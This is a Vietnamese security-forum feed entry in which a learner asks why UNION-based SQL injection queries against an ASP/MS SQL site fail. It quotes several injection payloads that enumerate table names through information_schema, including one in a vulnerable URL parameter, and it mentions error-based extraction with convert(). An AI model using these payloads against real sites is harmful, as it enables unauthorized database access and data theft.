<![CDATA[Latest posts for the topic "Hỏi về hàm Union trong SQL Injection"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Hỏi về hàm Union trong SQL Injection select theloai from news where id=5 union select table_name from information_schema.tables -- and theloai=2   Kết quả trả về là
Syntax error converting the nvarchar value 'users' to a column of data type int.  
Ở đây theo em hiểu là 2 trường ở 2 câu select bằng nhau (do cú pháp union) ,kết quả câu select thứ nhất giá trị kiểu int, còn câu select thứ 2 trả về kiểu text nên phát sinh lỗi. Nhưng em nghĩ trong thực tế đâu có dùng câu select 1 trường ra như vậy. Giả sử họ dùng
select * from news where id=5 select id,tieude,noidung from news where id=5 <br> .... 
Theo như trong bài viết tại /hvaonline/posts/list/163.html Em thấy dòng
http://vịtcon/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--  
có phải câu select sẽ là
SELECT * FROM product WHERE id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--  
như trong hướng dẫn hay không? (Vì em test thử ko thành công) Như vậy thì câu select có nhiều hơn 1 trường và có lẫn lộn kiểu int và text thì hàm union có lấy được thông tin hay không. Vì em đã thử với
select id,tomtat from news where theloai=2 union select top 1 table_name,table_name from ìnormation_schema.tables 
Nhưng không có kết quả.... Em có nghĩ đến dùng and 1=convert(int,(câu select)) nhưng em tìm không thấy trong bài hướng dẫn ở link trên, nên có một số thắc mắc. Mong các bạn giúp đỡ. Thanks ]]>
/hvaonline/posts/list/26617.html#161798 /hvaonline/posts/list/26617.html#161798 GMT
Hỏi về hàm Union trong SQL Injection /hvaonline/posts/list/26617.html#222645 /hvaonline/posts/list/26617.html#222645 GMT